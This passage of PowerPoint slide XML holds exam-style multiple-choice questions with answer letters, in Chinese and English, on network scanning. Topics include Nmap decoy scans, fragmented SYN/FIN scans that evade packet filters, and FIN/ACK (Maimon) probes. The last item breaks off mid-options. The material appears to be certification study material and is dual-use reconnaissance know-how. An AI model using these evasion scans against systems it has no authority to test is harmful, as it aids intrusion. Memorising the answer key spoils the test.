                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-D</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>參數為誘騙掃描</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(decoy scan)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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27273"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1097280">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>2,</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>某 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>MIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>人員欲對公司一重要伺服器（功能包含檔案伺服器、資料庫功能）使用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Nmap</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>來執行進行滲透測試，以便瞭解該資訊設備之漏洞是否全數修補完成，請問該 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>MIS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>使用此工具最主要之目的為下列何者？</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(A) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用該伺服器已知對外開放之服務埠進行情蒐</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(B) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用該伺服器已知之漏洞提升權限</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(C) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用該伺服器已知之漏洞竊取檔案</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(D) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>利用該伺服器已知之漏洞下載資料庫</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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68595175"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1097280">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>C</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>3.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="14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TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Which of the following scanning method splits the TCP header into several packets and makes it difficult for</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>packet filters to detect the purpose of the packet?</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>A. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ACK flag probe scanning</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>                                </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>B. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>ICMP Echo scanning</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>C. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>SYN/FIN scanning using IP fragments</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>          </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>D. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>IPID </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>scanning</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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2561617"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2125980">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>C</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">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TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>4.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">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TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Sam is a penetration tester hired by Inception Tech, a security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>organization. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>He was asked to perform port</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>scanning on a target host in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>network. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>While performing the given task, Sam sends FIN/ACK probes and</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>determines that an RST packet is sent in response by the target host, indicating that the port is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>closed.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>What is the port scanning technique used by Sam to discover open ports?</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900">
                        <a:buAutoNum type="alphaUcPeriod"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Xmas </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>scan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>                </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>B. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>IDLE/IPID header scan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>     </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>C. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>TCP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Maimon</a:t>
                      </a:r>
                      <a:r>
